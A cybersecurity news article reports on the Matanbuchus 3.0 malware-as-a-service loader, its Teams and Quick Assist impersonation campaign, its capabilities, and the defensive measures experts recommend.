Matanbuchus 3.0 loader enables stealth ransomware attacks using Quick Assist and Teams lures

A newly upgraded malware loader known as Matanbuchus 3.0 is enabling cybercriminals to conduct highly targeted ransomware attacks, employing advanced evasion techniques that challenge even well-defended networks.

First introduced in 2021 and now in its third major version, the malware-as-a-service platform has been fully rewritten based on operator feedback. The new release includes detection logic for endpoint protection platforms from vendors such as Microsoft, CrowdStrike, SentinelOne, Sophos, Trellix, Cortex, Bitdefender, ESET and Symantec. It also offers DNS-based command-and-control communications for greater stealth.

Originally advertised on Russian-language forums at US$2,500 per rental, the loader now commands monthly fees of US$10,000 for the HTTPS variant and US$15,000 for the DNS version—positioning it for high-value threat actors.

According to researchers at Morphisec, a campaign launched in September 2024 used Microsoft Teams to impersonate IT helpdesks. Attackers encouraged employees to activate Quick Assist, Microsoft’s built-in remote support tool. Once access was granted, users were guided to run PowerShell scripts that retrieved ZIP files from external servers.

The ZIP archives contained renamed Notepad++ updaters, modified configuration files pointing to typosquatted domains, and malicious DLLs that side-loaded the Matanbuchus loader. Secondary payloads included well-known ransomware precursors such as Cobalt Strike, QakBot and DanaBot.

Key capabilities of Matanbuchus 3.0 include in-memory execution, dynamic obfuscation using MurmurHash3, Heaven’s Gate-style syscall evasion, WMI Query Language reconnaissance, and PowerShell-based reverse shells. Command-and-control traffic is masked as legitimate Skype activity, while persistence is achieved through scheduled tasks and COM-based shellcode injection. The malware also scans host systems for installed applications, services and security tools to adapt its behaviour mid-operation.

Security researchers note that these techniques align with tactics observed in campaigns attributed to ransomware groups such as Black Basta. The loader was seen in use weeks before its public promotion on July 7, 2025, suggesting early distribution among sophisticated actors.

This evolution underscores a growing market for subscription-based cybercrime infrastructure. Experts recommend strengthening protections around chat-based platforms, validating remote access requests, and monitoring script executions and endpoint behaviours for signs of “living off the land” attacks.